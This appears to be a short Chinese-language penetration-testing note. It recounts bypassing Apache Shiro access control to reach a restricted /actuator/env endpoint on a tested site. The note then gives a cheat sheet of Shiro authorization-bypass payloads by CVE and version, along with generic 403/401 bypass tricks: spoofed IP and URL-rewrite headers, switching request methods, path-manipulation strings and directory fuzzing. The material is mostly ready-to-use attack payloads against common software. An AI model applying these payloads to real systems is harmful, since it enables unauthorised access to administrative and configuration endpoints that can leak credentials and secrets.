測試發現shiro框架網站二級目錄下存在/actuator/info目錄,但是無權限訪問,如下圖:
利用shiro權限繞過漏洞構造payload:/xxx//actuator/env,可成功訪問:
shiro權限繞過利用姿勢:
⽆ Shiro < 1.5.0 尾斜杠 /admin/
CVE-2020-1957 Shiro < 1.5.2 分號截斷 /;/admin
CVE-2020-11989 Shiro < 1.5.3 ContextPath分號截斷 /;admin/
CVE-2020-13933 Shiro < 1.6.0 Urldecode順序不同 /admin/%3bindex/
一些403/401頁面bypass小技巧
1、添加headers
X-Forwarded-For:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-Client-IP:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
X-Original-URL:/admin
X-Override-URL:/admin
X-Rewrite-URL:/admin
2、改變請求方式:get--->post
3、框架漏洞(example:shiro)
/login/..;/admin
//admin
/admin/
/.;/admin
/admin/~
/./admin/./
/admin?param=
/%2e/admin
/admin#
/admin/%3b/
4、IP訪問
5、fuzz二三級目錄